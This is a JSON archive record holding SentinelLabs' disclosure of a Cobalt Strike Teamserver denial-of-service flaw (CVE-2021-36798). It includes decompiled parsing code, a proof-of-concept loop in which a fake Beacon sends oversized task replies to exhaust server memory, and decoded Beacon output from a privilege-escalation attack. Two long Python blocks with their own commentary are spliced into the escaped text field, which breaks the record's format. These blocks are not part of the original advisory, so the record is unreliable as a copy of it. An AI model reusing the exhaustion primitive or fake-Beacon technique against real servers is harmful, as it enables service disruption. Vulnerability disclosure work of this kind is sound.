{
	"id": "be34e42d-8efd-4082-91fd-202e084bcadf",
	"created_at": "2026-04-06T00:10:09.424169Z",
	"updated_at": "2026-04-10T13:12:01.36795Z",
	"deleted_at": null,
	"sha1_hash": "75263ce57f2b8c3bfe32f7f06c6541621a45c0d2",
	"title": "Hotcobalt - New Cobalt Strike DoS Vulnerability That Lets You Halt Operations - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 465024,
	"plain_text": "Hotcobalt - New Cobalt Strike DoS Vulnerability That Lets You\r\nHalt Operations - SentinelLabs\r\nBy Gal Kristal\r\nPublished: 2021-08-04 · Archived: 2026-04-05 18:00:03 UTC\r\nExecutive Summary\r\nVersions 4.2 and 4.3 of Cobalt Strike’s server contain multiple Denial of Service vulnerabilities (CVE-2021-36798).\r\nThe vulnerabilities can render existing Beacons unable to communicate with their C2 server, prevent new\r\nbeacons from being installed, and have the potential to interfere with ongoing operations.\r\nWe have released a new Python library to help generically parse Beacon communication in order to help\r\nthe research security community.\r\nIntroduction\r\nCobalt Strike is one of the most popular attack frameworks designed for Red Team operations. At the same time,\r\nmany APTs and malicious actors also use it.\r\nSentinelOne has seen numerous attacks involving Cobalt Strike Beacons across our customer base. SentinelOne\r\ndetects Cobalt Strike Beacon and we are constantly rolling out new ways to detect modifications or novel ways to\r\nload Beacon in memory.\r\nGiven its rampant adoption by red teams and attackers alike, we wanted to better understand the operational\r\nsecurity of Cobalt Strike. This led us to discover the vulnerabilities reported in CVE-2021-36798 and which we\r\ndescribe below.\r\nBeacon Communications\r\nTo understand the vulnerabilities we found, we will briefly cover how Cobalt Strike Beacon communication\r\nworks.\r\nThe first time the Cobalt Strike server runs, it creates randomly generated RSA keys, private and public, stored in\r\na file named “.Cobalt Strike.beacon_keys”. 
Every Beacon stager has the public key embedded in it.\r\nhttps://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nPage 1 of 6\r\nWe can get the Beacon’s public RSA key by parsing its configuration\r\nWhen a Beacon stager runs, it gathers information about the computer it is running on (CPU architecture, keyboard layout, internal IP, etc.), encrypts that info using the public key, and sends it to the server in an HTTP GET request. We will refer to that part as “Beacon registration”.\r\nAfter the Beacon has registered with the server, the attacker can interact with the Beacon. From this point, the Beacon works by receiving and replying to “tasks”. Tasks can, for example, be used to get a process list, run a command, conduct lateral movement, and do many other things of interest to the attacker.\r\nReceiving tasks generally happens over HTTP GET requests, and the Beacon replies with the task data over HTTP POST requests. Tasks are encrypted using an AES key sent by the Beacon in the registration request. The entire communication flow is explained in the official documentation, but the outline above should suffice for what follows.\r\nOne of the most famous features of Cobalt Strike is its Malleable C2. In short, this feature lets the attacker encode (“transform” in Cobalt’s language) all the Beacon’s HTTP communications. 
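The Malleable C2 idea is easiest to see in code. The block below is an added example written for this page; it is not code from SentinelLabs’ library or from Cobalt Strike, and its step semantics are assumptions made for the example: base64 and base64url encode the data, prepend and append wrap it in literal text, mask XORs it with a random 4-byte key that is sent in front of the data, and a final header, parameter or print step says where in the HTTP request the result travels. The two profile fragments at the bottom are constructed in the spirit of the jquery profile and are not the real profile’s settings.

```python
import base64
import os

TERMINATORS = ('header', 'parameter', 'print')


def b64url_decode(data):
    # Tolerate stripped padding, which URL-safe transforms usually drop.
    return base64.urlsafe_b64decode(data + b'=' * (-len(data) % 4))


def xor_mask(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


class Transform:
    # steps: list of tuples such as ('base64url',), ('prepend', '__cfduid='), ('header', 'Cookie').
    # Assumed semantics (example only): base64/base64url encode, prepend/append add literals,
    # mask XORs with a random 4-byte key that is prepended, and the final header/parameter/print
    # step says where the data is carried in the HTTP request.
    def __init__(self, steps):
        if not steps or steps[-1][0] not in TERMINATORS:
            raise ValueError('a transform must end with header, parameter or print')
        self.steps = steps

    def encode(self, data, key=None):
        # Apply the steps top to bottom, as a Beacon would when building a request.
        # Returns (body, headers, params): the places the data can end up.
        key = os.urandom(4) if key is None else key
        body, headers, params = b'', {}, {}
        for step in self.steps:
            name, arg = step[0], (step[1] if len(step) > 1 else None)
            if name == 'base64':
                data = base64.b64encode(data)
            elif name == 'base64url':
                data = base64.urlsafe_b64encode(data).rstrip(b'=')
            elif name == 'prepend':
                data = arg.encode() + data
            elif name == 'append':
                data = data + arg.encode()
            elif name == 'mask':
                data = key + xor_mask(data, key)
            elif name == 'header':
                headers[arg] = data.decode('ascii')
            elif name == 'parameter':
                params[arg] = data.decode('ascii')
            elif name == 'print':
                body = data
            else:
                raise ValueError('unknown transform step ' + name)
        return body, headers, params

    def decode(self, body, headers, params):
        # Undo the steps bottom to top: take the data from where the terminator put it,
        # then reverse each step. This is the walk a capture-decoding tool has to do.
        last = self.steps[-1]
        if last[0] == 'header':
            data = headers[last[1]].encode('ascii')
        elif last[0] == 'parameter':
            data = params[last[1]].encode('ascii')
        else:
            data = body
        for step in reversed(self.steps[:-1]):
            name, arg = step[0], (step[1] if len(step) > 1 else None)
            if name == 'base64':
                data = base64.b64decode(data)
            elif name == 'base64url':
                data = b64url_decode(data)
            elif name == 'prepend':
                prefix = arg.encode()
                if not data.startswith(prefix):
                    raise ValueError('expected prefix ' + arg)
                data = data[len(prefix):]
            elif name == 'append':
                suffix = arg.encode()
                if not data.endswith(suffix):
                    raise ValueError('expected suffix ' + arg)
                data = data[:len(data) - len(suffix)]
            elif name == 'mask':
                if len(data) < 4:
                    raise ValueError('masked data too short for a key')
                data = xor_mask(data[4:], data[:4])
            else:
                raise ValueError('unknown transform step ' + name)
        return data


# Constructed profile fragments in the spirit of the jquery profile, not the real one.
METADATA_STEPS = [('base64url',), ('prepend', '__cfduid='), ('header', 'Cookie')]
POST_OUTPUT_STEPS = [('mask',), ('base64url',), ('print',)]


def roundtrip(steps, data, key=None):
    t = Transform(steps)
    return t.decode(*t.encode(data, key))


if __name__ == '__main__':
    body, headers, params = Transform(METADATA_STEPS).encode(b'hello')
    print(headers, Transform(METADATA_STEPS).decode(body, headers, params))
```

Encoding runs the steps top to bottom, exactly as a Beacon would before sending registration metadata in a Cookie header or task output in a POST body; decoding walks them in reverse, which is the walk any tool that wants to read captured Beacon traffic has to perform once it has recovered the steps from the Beacon’s configuration.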
The registration and tasking flow described above is wrapped in the chosen Malleable profile’s transformation steps, which are also embedded in the stager itself.\r\nBelow is an example of a popular Malleable C2 profile that masquerades traffic as a normal request for the jquery code (source):\r\nAn example of a popular Malleable C2 profile\r\nVulnerabilities\r\nOne Cobalt Strike vulnerability had already been reported before this work. A great write-up by nccgroup is worth reading for a more in-depth understanding of Beacon’s communication internals. In practice, that vulnerability allowed remote code execution on the server.\r\nWe’re not interested in a remote code execution vulnerability here, as it would be overkill for our purposes. Considering that the server’s code is written in Java and isn’t very large, it wasn’t too hard to find bugs there.\r\nFor example, in the Screenshot and Keylogger task replies, there’s an interesting behavior when reading the reply’s data:\r\npublic void process_beacon_callback_decrypted(final String beaconID, final byte[] responseBytes) {\r\n    ...\r\n    ...\r\n    try {\r\n        final DataInputStream responeBytesStream = new DataInputStream(new ByteArrayInputStream(responseBytes\r\n        cmd = responeBytesStream.readInt();\r\n        if (cmd == 0) {...}\r\n        ...\r\n        else if (cmd == 3) {\r\n            final DataParser dp = new DataParser(CommonUtils.readAll(responeBytesStream));\r\n            dp.little();\r\n            final byte[] scData = dp.readCountedBytes();\r\n            final int scDesktop = dp.readInt();\r\n            final String scTitle = this.getCharsets().process(beaconID, dp.readCountedBytes());\r\n            final String process6 = this.getCharsets().process(beaconID, dp.readCountedBytes());\r\n            if (scData.length == 0) {\r\n                output(BeaconOutput.Error(beaconID, \"screenshot from desktop \" + scDesktop + \" is emp\r\n                return;\r\n            }\r\n            ...\r\n            output(BeaconOutput.OutputB(beaconID, \"received screenshot of \" + scTitle + \" from \" + proces\r\n            ...\r\n}}}\r\nIn this example, we see the parsing of a screenshot task reply. To read the screenshot’s data, it calls the function readCountedBytes, which reads an integer from the first four bytes of the data and treats it as the screenshot’s size without any sanity checks.\r\nThen, before reading the screenshot’s data, it allocates a buffer big enough to hold it:\r\nbyte[] array = new byte[ReplySize];\r\nBy manipulating the screenshot’s size field we can make the server allocate a buffer of any size we choose. However, in order to trigger this piece of code, we need to be able to talk to the server like a Beacon.\r\nBy combining all the knowledge of the Beacon communication flow with our configuration parser, we have all we need to fake a Beacon.\r\nWe’ve published a POC Python script that does just that: it parses a Beacon’s configuration and uses the information stored in it to register a new random Beacon on the server. After registering the Beacon, it’s pretty trivial to use the primitive found above to iteratively send fake task replies that squeeze every bit of available memory from the C2’s web server thread:\r\nsize = 1000000000\r\nwhile True:\r\n    try:\r\n        if size \u003c 20:\r\n            break\r\n        send_task(fake_beacon, size)\r\n    except KeyboardInterrupt:\r\n        break\r\n    except Exception as e:\r\n        size = size\r\nThis leads to the crashing of the server’s web thread that handles HTTP stagers and Beacon communication:\r\nCrashing the server's web thread\r\nThis would allow an attacker to cause memory exhaustion in the Cobalt Strike server (the “Teamserver”), making the server unresponsive until it's restarted. 
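To see the bug in miniature, the following Python is an added example written for this page (not the post’s POC script, SentinelLabs’ library or Cobalt Strike’s code). It builds a fake screenshot reply with the layout the decompiled handler reads (a big-endian callback id, then little-endian counted fields) and parses it twice: once with a readCountedBytes that trusts the length exactly as described above, and once with the check the server lacked. The field names, the try_parse helper and the MAX_COUNTED cap are assumptions for the example, and the sample reply is constructed.

```python
import struct

# Everything below is illustrative: constructed sample data and assumed names,
# not Cobalt Strike's code or SentinelLabs' released library.
CALLBACK_SCREENSHOT = 3
MAX_COUNTED = 4 * 1024 * 1024  # hypothetical per-field cap a hardened server might enforce


def counted(data):
    # Little-endian int32 length prefix followed by the bytes: the layout readCountedBytes consumes.
    return struct.pack('<i', len(data)) + data


def build_screenshot_reply(sc_data, desktop=0, title=b'Untitled - Paint', proc=b'mspaint.exe', claimed_len=None):
    # Lay the reply out as the decompiled handler reads it: a big-endian int32 callback id,
    # then little-endian counted fields. claimed_len lets a fake Beacon lie about the
    # screenshot size without actually sending that many bytes.
    length = len(sc_data) if claimed_len is None else claimed_len
    body = struct.pack('<i', length) + sc_data + struct.pack('<i', desktop)
    body += counted(title) + counted(proc)
    return struct.pack('>i', CALLBACK_SCREENSHOT) + body


class DataParser:
    # max_counted=None reproduces the unchecked behaviour; a cap enables the hardened read.
    def __init__(self, buf, max_counted=None):
        self.buf = bytes(buf)
        self.pos = 0
        self.max_counted = max_counted
        self.allocated = 0  # bytes handed to the allocator on behalf of the peer

    def read_int(self):
        if self.pos + 4 > len(self.buf):
            raise ValueError('truncated reply at offset %d' % self.pos)
        (value,) = struct.unpack_from('<i', self.buf, self.pos)
        self.pos += 4
        return value

    def read_counted_bytes(self):
        n = self.read_int()
        if self.max_counted is not None:
            # Hardened path: the length must be non-negative, fit in what was actually
            # received, and stay under a sane cap, before anything is allocated.
            remaining = len(self.buf) - self.pos
            if n < 0 or n > remaining or n > self.max_counted:
                raise ValueError('bad counted length %d (remaining %d)' % (n, remaining))
        # Unchecked path (and the hardened path once the check passed): allocate n bytes,
        # just like new byte[ReplySize], then copy in whatever was actually sent.
        out = bytearray(n)
        self.allocated += n
        chunk = self.buf[self.pos:self.pos + n]
        out[:len(chunk)] = chunk
        self.pos += n
        return bytes(out)


def read_screenshot_fields(dp):
    # Same field order as the cmd == 3 branch in the decompiled handler.
    sc_data = dp.read_counted_bytes()
    desktop = dp.read_int()
    title = dp.read_counted_bytes().decode('latin-1')
    proc = dp.read_counted_bytes().decode('latin-1')
    return {'screenshot': sc_data, 'desktop': desktop, 'title': title, 'process': proc}


def try_parse(reply, max_counted=None):
    # Returns (bytes_allocated, fields_or_None, error_or_None) so both behaviours can be compared.
    (cmd,) = struct.unpack_from('>i', reply, 0)
    if cmd != CALLBACK_SCREENSHOT:
        raise ValueError('not a screenshot callback: %d' % cmd)
    dp = DataParser(reply[4:], max_counted)
    try:
        fields = read_screenshot_fields(dp)
        return dp.allocated, fields, None
    except ValueError as exc:
        return dp.allocated, None, str(exc)


if __name__ == '__main__':
    honest = build_screenshot_reply(b'PNGDATA')
    forged = build_screenshot_reply(b'PNGDATA', claimed_len=16 * 1024 * 1024)
    print('honest, hardened  :', try_parse(honest, MAX_COUNTED))
    print('forged, unchecked :', try_parse(forged)[::2])
    print('forged, hardened  :', try_parse(forged, MAX_COUNTED)[::2])
```

Running the block prints the three outcomes. The honest reply parses either way; the forged reply makes the unchecked parser hand 16 MiB to the allocator before it notices the reply is truncated, while the hardened parser rejects the length up front, because a counted field can never legitimately be longer than the bytes that actually arrived. The post’s POC starts at 1000000000 and is sent in a loop against a live Teamserver; the smaller forged length here keeps the demonstration safe to run on a workstation.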
Live Beacons therefore cannot communicate with their C2 until the operators restart the server.\r\nRestarting, however, won’t be enough to defend against this vulnerability, as it is possible to repeatedly target the server until it is patched or the Beacon’s configuration is changed.\r\nEither of these will make the existing live Beacons obsolete, as they’ll be unable to communicate with the server until they’re updated with the new configuration. Therefore, this vulnerability has the potential to severely interfere with ongoing operations.\r\nAlthough used every day for malicious attacks, Cobalt Strike is ultimately a legitimate product, so we disclosed these issues responsibly to HelpSystems, and they have fixed the vulnerabilities in the latest release (Cobalt Strike 4.4).\r\nUtilities\r\nOn our Cobalt Strike parser repository, we’ve added new modules and code examples that implement:\r\nParsing of a Beacon’s embedded Malleable profile instructions\r\nParsing of a Beacon’s configuration directly from an active C2 (like the popular nmap script)\r\nBasic code for communicating with a C2 as a fake Beacon\r\nOther than registering a fake Beacon with the server, the code we are releasing makes it easier to parse captured Beacon communications in a generic way.\r\nLet’s take, for example, a case of captured unencrypted Beacon communication from malware-traffic-analysis and decode it using the new communication module:\r\nfrom urllib import parse\r\nfrom pcaper import PcapParser\r\nfrom parse_beacon_config import *\r\nfrom comm import *\r\nconf = cobaltstrikeConfig(r\"beacon.bin\").parse_config()\r\npparser = PcapParser()\r\nreqs = pparser.read_pcap({'input': r\"2019-07-25-Hancitor-style-Amadey-with-Pony-and-Cobalt-Strike.pca\r\nt = Transform(conf['HttpPost_Metadata'])\r\nfor req in reqs:\r\n    if conf['HttpPostUri'] in req.uri:\r\n        params = 
{k: v[0] for k, v in parse.parse_qs(parse.urlsplit(req.uri).query).items()}\r\n        print('\\n\\nFound beacon reply:\\n', t.decode(req.body, req.headers, params)[1])\r\nOutput:\r\n...\r\nFound beacon reply:\r\n ♠r↓10.7.25.101:445 (platform: 500 version: 6.1 name: HIDDENROAD-PC domain: WORKGROUP)\r\nScanner module is complete\r\n\"))\r\nFound beacon reply:\r\n ☺►[*] Wrote hijack DLL to 'C:\\Users\\SARAH~1.RUT\\AppData\\Local\\Temp\\745f.dll'\r\n[+] Privileged file copy success! C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll\r\n[+] C:\\Windows\\System32\\sysprep\\sysprep.exe ran and exited.\r\n[*] Cleanup successful\r\n...\r\nIt parses the Malleable C2 instructions embedded in the Beacon’s configuration and uses them to decode Beacon replies from the captured HTTP requests.\r\nThere’s a lot that can be done with this new communication library, and it will be interesting to see what other researchers from the community will do with it.\r\nConclusion\r\nResearch into attack frameworks like Cobalt Strike and Cellebrite is still a niche area. 
We hope that this research and the tools we have released help to further encourage research into the robustness of attack frameworks and expand the range of available options when facing their consistent abuse.\r\nDisclosure Timeline\r\nWe would like to thank HelpSystems for their approach to our disclosure and for remediating the vulnerabilities.\r\n04/20/2021 - Initial contact with HelpSystems for issue disclosure.\r\n04/22/2021 - Issue details disclosed to HelpSystems.\r\n04/23/2021 - HelpSystems confirmed the issue and asked for an extension until August 3rd.\r\n04/28/2021 - SentinelOne accepted the extension.\r\n07/18/2021 - Submitted CVE request to MITRE.\r\n07/19/2021 - CVE-2021-36798 was assigned and reserved for the specified issue.\r\n08/02/2021 - SentinelOne shared the publication date and post for review.\r\n08/02/2021 - HelpSystems reviewed and confirmed the post for publication.\r\n08/04/2021 - HelpSystems released Cobalt Strike 4.4, which contains a fix for CVE-2021-36798.\r\nAll issues found by SentinelOne are disclosed to the relevant third party according to our Responsible Disclosure Policy for Third Parties.\r\nSource: https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/"
	],
	"report_names": [
		"hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434209,
	"ts_updated_at": 1775826721,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/75263ce57f2b8c3bfe32f7f06c6541621a45c0d2.pdf",
		"text": "https://archive.orkl.eu/75263ce57f2b8c3bfe32f7f06c6541621a45c0d2.txt",
		"img": "https://archive.orkl.eu/75263ce57f2b8c3bfe32f7f06c6541621a45c0d2.jpg"
	}
}